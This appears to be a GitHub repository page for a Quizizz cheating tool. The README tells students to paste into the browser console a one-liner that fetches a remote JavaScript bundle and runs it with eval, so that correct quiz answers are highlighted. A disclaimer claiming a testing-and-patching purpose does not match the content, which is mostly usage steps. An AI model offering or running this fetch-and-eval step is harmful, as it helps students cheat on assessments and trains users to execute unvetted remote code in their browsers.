Skip to content

DISCLAMER: I am not using this for cheating, or hacking... I just want to test how this exploit works and make a patch for teachers later.

License

Notifications You must be signed in to change notification settings

acimovicuwu/ProjectBeta

 
 

Repository files navigation

Project Beta

Fetching Quizizz API

DISCLAMER: I am not using this for cheating, or hacking... I just want to test how this exploit works and make a patch for teachers later.

It should work in Test and Classic mode.

  1. Join Quiz
  2. Open console and paste this
fetch("https://raw.githubusercontent.com/acimovicuwu/nijeNistaSumnjivo/master/dist/bundle.js")
.then((res) => res.text()
.then((t) => eval(t)))
  1. You can now close the console. The good answers should be highlighted by background opacity.

HOW TO DETECT

Currently there is no way...

HOW TO PREVENT

Prevent this exploit by marking wrong answers and than marking it by hand.

WHEN WILL WE HAVE A PATCH

Soon(is) i expect around March

IS THIS ILIGAL

If you are student you can get in truble.

HOW TO SPREAD AN ISSUE

Email quizzies at: support@quizizz.com With your conserns.

About

DISCLAMER: I am not using this for cheating, or hacking... I just want to test how this exploit works and make a patch for teachers later.

Topics

Resources

License

Stars

Watchers

Forks

Languages

  • TypeScript 75.1%
  • JavaScript 24.9%